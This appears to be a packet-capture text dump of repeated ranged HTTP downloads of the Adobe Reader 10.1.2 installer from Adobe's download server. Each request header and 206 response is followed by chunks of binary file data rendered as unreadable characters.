........\w.....2Bnv..a../.W....!..m...|Id.,G9v~`.P.....D..WT..0i~.
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=15728640-16777215

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:53 GMT

Content-Range: bytes 15728640-16777215/53784984

Content-Length: 1048576

Connection: keep-alive
..&......Ps.6..P...L.:.0..9...X..8.......v.(Rs.qf....'..u.V.........??
.D._.....w.B....G..Y*..6(....I%...24...MZ.BH..{=.....|.#.......|......
.v.3.........j..%....K.....=.&.4.....w.. o...../...BlG......a3U.{..$..
.{......y.z}rt.0.U.s.k.z.Q..([email protected].......,~#;.xQ..^E.....
.V... ...S%p....x./TF.^S......7..E.`.X....qR.px..\k...H......vcN.BUL..
...B/.2.......Q!.D..>......cD...z0..5.L7......m..s7x1q.x...J..>N
}.m.T...]..]&......^......8..*..J...n|..e.W_...C!M.N...g%_.V....J.....
......C........a. ......)UN...........r...&....L.C..."l.NHM....g...}..
.Q.#.......Ka6\.....\4....qa.5.I.RN....v.BMU.DY..mq..Mkn.~.;.3X.....*-
...<..@ ..M0f\["v.6.. ._..U.%3.@P=....D~.A;d.......-8..H..F...../.H
..........q.V.j..g.uuC..r........VGX....K.t...d..-.NHF!fA#.[F>.e...
.'..0.]%..&.q!\.a.....pU..\B....h...^^,.&./sxoT..'Z...;...~...v.>..
`._O......;..!=."F....B.s).F.....j.)K.h*.Gu..rc..#...".W`pt..:......,.
sHqW&0g\&..,3....5..{....#.f,_;.t..~.)do).de......O...3...<2.3.25&.
.....V.57.%.}oE.\Z...,?...b.}J...:..7j6...n.x6,5......dgh}.9...b.Y....
..?.MI4.Rj.....=.Z.t.b|..o.~4......I......m...Z..=..W{..q"'$.....L6.9.
@..2...Z...y/......R.....b.T.....N}..P..T..z.e.$.B.."t}....e.ol.J.....
.#.^.xms'h"[email protected]..'.]..{...1!...w.A..K.V.^.......J2.o.0{...C
.P..3.[.......,."$......M.yr...tN.......%..;.t.-....._........'....58.
rR.Z..1.^.9E..../{h..W..t...i..`X2>.}..D./.>...u>!O ?4...(E..
...s8KlJX......d...k.ULE..V../....b.a..Jv.w<.^...sp#z..j.. 0.....B`
0xin....W....D..J]n..Q#..V....i%U.Y-..v....J...:.p(T..s.....`$`my.
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=16777216-17825791

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:54 GMT

Content-Range: bytes 16777216-17825791/53784984

Content-Length: 1048576

Connection: keep-alive
...=....}..r.\.l...bt.....'z:..`...-!Q....?.!.l1......`....n.s...~] ..
.......n/...&....i...>.h.(Jf...r@..~.......)...... ...U....V..*.I..
;0..$..RoE...*....Y",9.>KN.........V.....H:.."..9...Q.r...d.=.`....
.}v...0#...?..q...p`...o..k\..;.It./..w...7.............U/.....r).%...
.i.....v6...'....R6n>t..%...4x_W%..w.!..H....4..%.l.....v.o.....d.@
>...w.8..2....9Q..B...D.d.....03..Yq.l.. .....b.eA.....0...*%'.5..d
...[.s.,.2.......[..[[email protected]..".p..nH.........G.8...mJ.rCt..H....
......Cn......x]0...!.})a)Y"Y.G....NV}..U....../2gv.e..l...._........:
.W8..k.Df..F.&...N...A..O2...~ua..x...8._o..5..j.3.e...P.N#.G..;:H....
...e.....`.o[......1...S.;9........w..U....pF......9....H.0b..........
...,..6.Iy......l<7..6...1....z.r......g.HJ<lou.."....5P....5...
.......oh.a:....D..~....u[..y[..\........ ./mJ?X.1.o0......F.I~E...j..
[email protected][email protected].  ...h.QK.5..x=k&..-M.^@f..c[u(.(z.J
....y.@1V... s.lR....].....as].1...T........!v..x=y.O.g...;..H......Q.
./....ZQ....z.....K...#[email protected][...O#...|uu.K...g.`...j...
{U.J.P_..j......y\.V.....V!.&.Ui..#.{2' .R..GZ.....=....&M..=y..ka....
.s.P. ./..tZ.../.b `m....d.M.R.Qkw.hN...Q....$.Jl.&xO...6..].Q.)7...&l
t;?.9.X$H ..Hw.......~...-hal.........G!..K....n..1.j.....l...H.Bn.>
;...-......o...Nw.`......_Ox...,"..0VH.Z......=..7J(Y..F...T.0.......Z
4............*./t..z_.'H.......4 ....'e.e.....l..p..C,..fs ....~...lr 
>.u...@.*Dj.......Q.:..z.A....x....<}......v.D .6^eL.......S...;
............L.....[..br.r^.......]r.d;\A.&.&:.....-mE..A{...'L..j.
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=17825792-18874367

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:54 GMT

Content-Range: bytes 17825792-18874367/53784984

Content-Length: 1048576

Connection: keep-alive
...J.!0...~.C.F...{w.R.h..Fr.X o....qf.YK.............r._.....<..].
.mVT....Ug...p.}....I...5\.0.................o.......v.qZ., ........t-
..KH...- (.\.....n...2..#.?..... M ~3......8t.G.&.... ..g.....3....=".
...7..M....F.=$...7......ZEwG....\...5..7k/......v..........8...H...i.
0...F3.....9..f9'......\..W2......Z.j.).g............._4M........! ...
Tof.@`..r.....g........<...KW....Q...a......J..<.".7M....r}.....
.s,......jLO.f.(1.F....pK....a4...C......_<-3........z..u9gf..^..D.
..T..a;.n.va..4..:....xi.2x..!8a..)}*.....J<T.e.d..bG..y.. .;.>.
A.n.>.Co.i.U0.j.L1o.`.V.Z.=[..UB.u.9.........._6.....`.....q.......
0......y..@.$..'H......W.&..F.`.-y.X.......Z..(..w.U.9EI....(Q..W ...e
........ .(.~c...E.1......ho..3-..O4..9hI.&.9V..c....in..d..%.....#%.&
lt;...K.2~..r9.plp6Zt.N/*....=.?9..n........uq=[^........2...........D
. ..S.z .........Va......_.g;8..AFtj.;|....[.f.c..U..8u.kp..,..X..f...
.qu.s. h.....!>#..F.._....0..[3T..%.....G.j..a.../bz>hcV.....3w.
..&(...>r<U..........U.........2wG.sr...L0<.D...../5,..M... o
*..!..'..(...........F..Bx.~:cjU.......o5...6.A$.Z....PTr..*I.......6.
..9.s.....f..,.@..[....\.X.!.`.q!S.l.m...q6..3...........\.|}....%$.6.
...S........76.F.#.....M%...l.....I,.O..R.../.N.,[email protected]=.Z.0~ .'.}..
Q.U..h......s.z....o.@..=.oJ....n.!..A......=...% .0..>.v...C.p..uN
..b..@4..*N..*..aHFe.g`..b.....V.#,*.._.......h.......:..B.....Fa...f.
....t.cN..2m..........?..E...u...>L...0..[?.....\_.o..5v..f.......F
d.p..v>.p.Y.O$.t.8..s....!...uDt...9../.s.Tg..o....b%.@>..'|
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=18874368-19922943

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:54 GMT

Content-Range: bytes 18874368-19922943/53784984

Content-Length: 1048576

Connection: keep-alive
..FU.N.a..m......k...(7...q.B.(23R9...T.m.R.....Mw...(..N.g.v..r...u.7
..,....wa.kdu......7...C.e4.E..SK).OX.Y.E4f[......a......J.....xh...._
...{...s3...%.S....\-.O."...#.....50oU.....*...x..U..3..k.m..G!.P.".m)
.=gL...b...5...6.y:.wQ .........8W...u.=i.N.l....p......!..E.}.~.2./..
..ObYf.U.....uZ....%.(mn.g ki]O.V 4=.c.(Y.R}..*Q.a.U..[..J...].....`..
...>....f_..c...S.#Q..w...Z)f)s.H.*.u.....h....j..~.q..L..?X.....G.
j.....m.r.......HT.w...c....4.........'.Iz..l._`a.q.D6....=..I..J..wCP
x..T....9..k0.......:..P....);)&.$.c..Ub.su..1..."5.Q.....**#....9..#;
....._Ra(/.}..~q....[.F.....n).......#...&..bG.BM.<....."jn....g#..
......a....qY....;z.).P.....i....|......C..'...X........R(.../........
! ......o..C...?.ae.P.qH9.F.B.........*g..kg.aT.[|....>-..!..;..rMQ
..B2\.WT..H.2h.6.Ap..!...4..=..o.69....Zy.....0.~....R)o.........M8...
... `c..t!....w$..s0.WT......{...F@..}....2.....z~..(.ks...y}.a..X..Gp
.J/bzg$:.Vr?k.\g.<...u..6.......g....4.2hq...Iq.......[./....>I.
.Sh..d*...hi..o\.m=......c...|x(..,X...7.[..0....6z..b/........i..X...
.....,v.Q..(*>i..Q.4-aH.t7..N.ourO[@gwL.(]#...vz.0..k...6....dLo.|.
:/..".%.R...fR.........s..kB.;.KyGfF.....~ .b....q..>..o=.r2d....55
.Z.7...dx2..BE..M,...4.j..t.h...`.G<az#.?.6..m.6..;[email protected]
C.....Q!....;..B......T...Q..f...8...q........I.{.7...$'.w!....H......
.4.......-oI..,,.l........Z.....-}r.v.i....%.=...Y..........x?..W7jK.&
lt;..;ER...)..U...!...............}a..S.....sI...W..X...2...}.......H.
......L#.N3...)P.C3o.z.1.V....V.......L.;r.$..x...dya.........J.P.
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=19922944-20971519

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:54 GMT

Content-Range: bytes 19922944-20971519/53784984

Content-Length: 1048576

Connection: keep-alive
.......=../..)Hy...}{.LrPj......f}[email protected]^/l.G. *fh._..f...3&W..
:!.h..d..S./.g.8H..u......k}........6.\....... ..4..u.<..1...&q....
. p.l<i..J...Gt....v|.i.9p...%..6....5O.^0ac1...{.$.....n>...4c.
D...LM...Q.......].r*........x......O.};u.YQL}.K.....`...'=.]Tg..7?...
s.....k....{J..}.k..L.T/.R...;..`K..AVW...9.q{......#.*_.#.."..r.:f'tg
.A.[Ad.{...#.jO....!}g$...L.t..M..$$ku..w.(`....P...6...}.a..,[email protected].
[email protected] xm\,.....(,t.T.D{...~2..4.Yp4......3...8...Nt.?.......~..
...H.< <...J..o3....#.....s..v......6=I%\.....g/<?....j.)r.a.
-..P...H......`3.'.......^[email protected].._.eJ8.l.#.l.4.q.....
.GW.w o3..H...L\.l.....!......'.......m(.....YE8.~...Pa.$..X.R.!p...~{
>~*.F..J..l{p..`...iP..IY.T.....v.....W.P..f,s...o...........\r..D.
.t#I...b:fP|(^T.. xi....v..k..^.....5..t..=5.2.............,.N..W|2...
. bS......4..?.t.....v...2..74m..]....b...|u9.....v..}.R..K.Up#...Zys5
Lz.........GX>[email protected]>...??.1y..Lv..t&..L3..
.4o.....W..3..JPM...(r..H.;...O.....M.w!..iY.*...'..j.<O6g.d.zt.2..
..X..kV...e.E#.....7U.4......"....... R.....C.. P.!..{...[.KmO.0.jh...
...?d%.h..~T......T..2.=UO...\U...Jq.dS.<HY....J..X(...p..3......mP
..r.p<)..*.!.L4e...i.5..A.>...K...V.$?..;.S.C........v{.Q.]...a.
|.`N..[..$.Z9...(Af.t.$!...-(..8....L1.pf.WG.[9K.2.zz....n.L.$.....(Od
.!ah.....!v.....4.6.X...j...Z..P....qzH.....c{.?J=?..aInz"._k...>/#
..z.0....}....;.?..o......X...O.$03...............)..)wl.Ge.>.. Uq%
...V&..E8v8.V4".R...P.......{%V.........~5(]...u.j.19|..9.k...5.3?
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=20971520-22020095

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:54 GMT

Content-Range: bytes 20971520-22020095/53784984

Content-Length: 1048576

Connection: keep-alive
................k.c|r$(.....~....*....c.}^.%..&.q*...JY....i`......R.#
..0M.vlop....3Eia.~e6......M..-z8l......6....|.M1&.. [email protected]...
p>.....[....[.N..8..U.. 1..a..D.6 ..|.`s........-O.6.([email protected]`
:A.}.2.>j.0.6..f..ZiH. G.........Z..|.........T...,.["[email protected]
.W.*L..}.....k......... W...i....H.h.?.._\<..F..T3.w[.........\z...
..p.Vg].NF..q#k.i...........D..9F....~i..M.M=;([email protected].
.....p....\[email protected].......".s............S...R.'$..A.
.8..p........?).w4.Zs.5. %|>..7Xt....o......Y[.G.u:....).zx.;H;.o]-
.$G.f.p.....%a...!A......%j..S"..?A..[.....<...u.0.v..l.!x.*.U.eXk.
\.8......S.....6..c...i1_T.v..Xv...*.VPoS"....Z.....V....]|.@V.....!..
......$f.2.E..AL........4..Z..x]/w...S........|.4o...^.0q...........6.
..9K_C?..&C....Z.0oKu.....O......[......)..e..........xM.M\.&.tv...5).
q`.......i..rl<.....F.H{..5a..9..?.'[email protected].(E..q*....0a_.
3..hDjc.E.`.t.:%. K....?.......{....H.7v.1...d.N..z.z?*....QV....:.|O4
[email protected]\.k....{!..--...l.j
.6...rO...$.}p9.me*.K._...F..*d.!1.X...N.P...?..0..^....Gnk..'.^.. ...
u. >.......f.[ ........U\..r...f..0...=.<.....p.*.gt..p'|....C.C
..i..J..0.A...........XE_l.g...R.....w.-N.?..[.. ..K.b.....V9&...N.A..
..8BJpGJ8....8.#...........**.z........#Eu...X;.b-..o\B.(.s..F.;....q5
.g.SM..Qa.......l......t.R>|S...%.u]U...%..$O.a..ffN.....(.|.....jw
.n.P.....s.gq...Q-B'.,.x.Q..8...<..Nz.#... .. .*.*..K.....h...[..!C
.O.y.T...DC..B...nv.a;...C.o3a..F..E.9A%[email protected]... X{O.L..V...
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=22020096-23068671

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:55 GMT

Content-Range: bytes 22020096-23068671/53784984

Content-Length: 1048576

Connection: keep-alive
....HR0...(.........|x..Bm$ ....>..u...,i..]...W!...&.~P..j...<;
....]@q}#Z..9qaf'.@^=J. ...Q.*...^'......./{.W.2. ...K.....>....9t.
......U;.b. ..G...H.?hC..8k{..x......D.C.6..-.-E.E.P..b.P..Ce.......UE
.Q...i.......S%..P.M...S....;...Rf...K.e..~.<].... .8.......|)....-
.8.}0_.....N....R.....E...G.L.9.?.0..O........8g..%.x..t...qE.R....{&l
t;...i.L..b.@.}..E..e........j|...w..j.."j.V..-<....'!0w......3Md..
C..*}.e.....'.d.Fi.pQ...L..ne..|u..f.!...........`..d...bv........'H..
h..*-r.f.0F.....U.%...3......#.(......,.;G...]}..x....^.-"....>.0&.
..A$6.T9..&m..p....%."?^5c.P.g.a..?uS...1. .A.._....AX.....=..7..$C.GO
._.'`L.:.q...l.J....cZ.... .]..H....~.....@.{r..`w..9H....p5.W........
Z.N9..W...?U..kQ{...o..Hm....?.\8..F._IKG..1Y.wk...KkX..A..X-?}.V.?...
..mVV..~9..5C..at.<...a..G..B,~.}...nA..C.)&.z..Q:..J..D`.H........
..pr......|....z..N.`..b.pN1...W..Y...S..Ew..)....:[.m..T........7..&.
k...y}.Bd.8.....C...I.%....g..R.bcM..E\...!M=....(.?p..2.L..x......:..
..)l.P...a..=.....g../\....[o.......).."..e.uVgY.U.......2..t.#t..3.o_
.gsE.V...~..3Um#....7 -]..U..7.*....I..>..]./{?.n.....v&.P......=\~
...7QP.<...4......<_w....t.5.....;.....W,v..%..l.{i.>RMEu.E.:
XO......i.....w<.c..a.*Y.......G3.1...~.E.7B......f.>..dB...;...
{.e.X...d....2.....i......z}..}...GXY......?.Y.........Q.....b..:..C..
.rN.m............"-...v.x..Q.....n....;..P.A1......L...U..\.... i.^...
.H=8...A..K0v<A>.Y{.?.......(-.. ...0y..=?.........D...Yy...N...
....T...%..hR ./W.. ..U..M....K.L..to....S.A..s(..o..0w..E.|.*#.P.
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=23068672-24117247

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:55 GMT

Content-Range: bytes 23068672-24117247/53784984

Content-Length: 1048576

Connection: keep-alive
.......U......W...........#..\....C..@|....ExQ.{[email protected].`s..zg...
%...c..3............l..Th...#.Y...n-..}a....6m...eWb....T.. G.J...e..u
W....[.!.0..L.....h.y]..J=#0|(..v).......N....}8.....<..83.6n._S..S
i.....4?....xqw.........!....i...gj.D.^.M........E{...c...z......t....
.y..t.Wfk/._.f....l...J3E.U_.....<.........Q.M.U<Ho..v.....g....
1z8...........93R.6....|..)....w.c........(..C..'c(..?X.f....D.t..a...
.7P.......$.Q.....<C>.V.L<.Q...x...~<....r..L...4.IJm.qBH#
m......Ht.;..@.%...r#........Tq.R.x.RG.I?<)@O.p|...v..<3.TN.<
.*. ..B.*|8E....x.....3.V..S....G.{.....4p.,.O...V...m1.... .M..a...n.
..x....9..=(.. ..#s>X.....@*(?.x]S.....C..7:Y.T....wy..f..@.[...X=.
.YX...~.nhe h.g.....G_.^...x.kB...Qm0Ol.q........R:p3.."....l...ue..J.
AaY...`|a,@.....6..z....tyU^..9qe.).^.........n..Y..=K.{..Z..}...{.?./
4wk..C.L.6..v:V....uZ<^.]....%.............N'..WJ..%>..&.../N.{F
..d....q*....h.....*E..yzn.6.]1Y.....-X.x..a.zn.?M .........f...p.t..=
 ........E.....^.E...m.2.. p.&..........F.S.....EZ...g....1.._....._".
....~.....8o.\u......O.XK?.T/....i5t.....K...',.....x..^h.*&..Zb.....)
...I.1.....BhF.....Dc.$....4.@...&j$..E..q.:..Ri..*....]...LO.....I...
X#..o.~...&."<..gcR.H.%.J.......#..z.....M..a.......Z..XomP<R?k^
...-T.C.....=1.3dD.. kp.C?|4.>..@....)~p..s....Va.Y..b.Z3*.,.......
.>v...:....z.S..L..V..5T.2G.;Pq.p...............@........!.........
.".M.%1'.....'..E{....ah....&.\:..O.D.. ..2"5..B8<.<S|[...A&)...
.R..T.........)u/...4`a0"0....".K#B.......'.Yu8.....Z..8?.B...d..'
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=24117248-25165823

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:55 GMT

Content-Range: bytes 24117248-25165823/53784984

Content-Length: 1048576

Connection: keep-alive
#....E.]......C..e.>.:..b`!GhP.....i,........1.....M.@#5.;.C.}89..W
..O..Q...f..>......_....G..c`{.......U.*....I.&N.W.......S..J....0.
..........av5..P.........1#..t..J..!./.|Dh.ug..\m..?......H..bX..K...C
."...z....}.8A 3."...w.#.......dc.Z..q7J5..C.>...G...vH.l..e..n...$
.l..Q.k.%':.......E.F...We8.0..*V...bdU.e..K.JQI.......}/.^..J..S.y.M.
.i...U.9fC,%/.u......hMu..../...$.;.....p...5.0.7]...j..*.?.z..-...%..
...t.s.}C-B_.y.).rpF}..]9...a...HU...6...G/.K.....}....f..[O.*2IK.e...
6.. .R...*K.p.E.......]..~.Wp.w...V.s.1..f.k...`....I..^$...V.8..z...E
{[...K.W...E...p.....e*.......A......PU_.'7..2Fn....M..._..h...5r.H.`.
,.....Cmf8..MZ...{A:...).X......VG.....a....s>.$.4.a...^C....#.....
o.A..d..V...S. (..TZ..F.nz).v...G....).2Z.O.OO..V..%...&.F..y)A.3l.0  
.V.;..n>.v ....o..o.T.f.F2.....*.....~u.`..kw..:....'P?qv.U..-.!...
...9.....%$gH..9E(%.....Qo.....?.%..b .....$......*..M..eF.`[email protected] ...
....o@...,.H.......=.f....[.lq......G..@?..Q..................z"~=k.&l
t;...&.B...c.....N..C.8....F.@M&s7....7`.J*......!.K]j..Ze.j0..7..u4..
...~...hV....*3k...5V...Y..X.\E.6....9...(W..b.E ...p......]&V..V.....
....*..J}(.. %..D...0^qS...c....D.....X%..L*o...'..x...UW...C.U.": 4..
.i..:%....(..u..n...k.!...y........N.J...{.<W.2....B_U:0...(I.SYu.$
.........qK.7.k.....W...Sn...{...v.b....6 .WP.m..l.....H6".7>.'....
.....`]...$wbi'.H...$e...%.Z....M.58}.a......N..|z`p...o..R.......tJ..
8...=.1../...n....!..>[email protected].."Z...OY.......X.......K".c..3%z'.:.
..:;C..<n~..p..Z...c.L=2 #S..."C. \...us.s.p..ce$bY...M......5.
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=25165824-26214399

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:55 GMT

Content-Range: bytes 25165824-26214399/53784984

Content-Length: 1048576

Connection: keep-alive
X..M.[].:WC....`.4.l...KU..Q. .E...S......;.-.Fc.......:.....&.....Y..
b......~4J.`.=gN&...g..............Ytd. ........G....k....E..<....=
...>..N.\....mG....R/J........S...y&..;.o...|.K..L.bB... ...T.][M .
.0....t.cJ%>P..%.(....e_...9.x.... ......9....@...!.k_..%........K.
.t..:..^.<..2. .%......ft....;4..*:.....<.jW..Qou/4.R..jKky...Y.
,{..}.(z..3!......4.Az....r.1i..qI..~.....iv!I..M`..m.'.T.J.. .6..;...
m/.l...b..C....T"S..#M..L..!C.{...TA=.......x..........ml...&.].8....k
9...]r ....Ov....(...e.'.Wet-j.pG.m;..)....;[email protected]....
..J[ [email protected].....!s....y%mW.|..Q..{[email protected]
q[..0!.....!.BMe.....Wh...9...M.q..............6.8w..6...Er...@..!.t..
[email protected]_..v.."n.O.z.V.m.Y,......[.7rw......h.F. .....:5S.>
`..M...M|...u..\.S..,..v../S. ..FE[..h.R..A....RU...>..s......Y.s_.
(.j).!..x..|}&d..H.=.g...........\......t).b.K....E...hho..K*6..9*....
.'F..!e.....x.. ....6...)~...t.........'E.-.N.6....Ar.. ...y.4.. Z....
...r...`Z.-...K....8y<.@....[..k..e...0..EdB.Ip.Q..2....T.o.tx..j.k
.D....Z!p.P.....H.t...%f..1.H.At^....*Oc.".mS6....j....B..#{yM\....../
g...R...T...M.l.=/..(.<.Y...q...E.B.:u.=_{.`..w.....*$..e...K.;.N.,
Y....._...9q....":)x.p..........rb..M........O.~A.4.B....W...}.q......
.<......$.xV.1......F5:..E.{c.<....b;N.$.....d.Tm.....mL.......z
.r...F.....W.....w....N7..k.^[email protected].@%....U2sz....j&r.......1..>f.
L.x...q.....%.R:[email protected]....
..|[email protected]'.i......IN....h..9m.D..h...-....R.....].H...
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=26214400-27262975

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:55 GMT

Content-Range: bytes 26214400-27262975/53784984

Content-Length: 1048576

Connection: keep-alive
.5...a.p....d1..!.....&J...(..3e...t....@1aQ..%M..$C...U...8.=........
z}.Nj.^..(V....S..$.:...gr.....A..^X8..q....z..........\)U..).Q.;uW;.N
.x..c...NE1b.......8.i...3....._.Rc.I>.0L.8H....OO......B.Z......NC
.....%|[.2...t..L..\C.ub..F_.Lf. ...K..I.`'.o...q&)2....FJ(..;p.-J_0.l
..f.0j...g.,........[....'.n5../@.&W.%.B.:87.....9...o..~8..Dx....i.WH
M...$.[.....\.c6.u>..@y...`[email protected]\T7P..M...O5.M.....j'6
F.P...F.HUG.;.;[email protected]?J
..W.!......I.?"QCf...\.......Oz;fT..1._....!......2.I.O..~).g....g...q
o.....m.>@O]..#G\..G#........t..(J...m.:0.N}...`'..%B..s.>......
.K..P.v.).E>.k{[email protected]}; f..<;.[.....{-...K..uv..D}.S.aN'....l.`
.4z.j...i....Z..p....c.....L<<?O.v-]...d.Q.4..{-..".....u1......
...G..PS.d..{..M..S.....F...de.&<.w...T.}.....!u.j8.7...:....9`.9..
....n.A.w.84l..SO.L. ..A...*..;...`oY..?C"0...o.n#...DU...KY...u.^...3
.....j...X.....=....z.x....?..v.9.Q>._to0.#.P..k..[.,..?......M....
........&D..P.....2...?..r\........1.e..H......o2M.3...I/.|.rIq..].>
;...K..._.....N.. .n.....l...j.5NF.....K.s`..IGE....zb;o.>~.4`.Gxp.
f..0u..Js...|..v.....m,,[email protected]...........[H\...r....*...Z.W..=....
.U.."j. &...p.....BL.....F...4.R.&.m.{..c3qH.'.@O&.7..Q1.\L..m.E...Ju.
.Q.E...>....:.......F).0'_....2.....AeUQ..?....7....7..IW..........
....J...N1Gd.M....V^.KK#T.,.....M..{.Y.4.-..=y0.eq......Pb............
.GW....8&YU......s....i..G.#,j ......#o..UCN..5f!.....l/....?.._:!....
.Bn.X..\.d.......E.w.....#....*....M.E-.c...../=.U\.PV..U.D9....^q
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

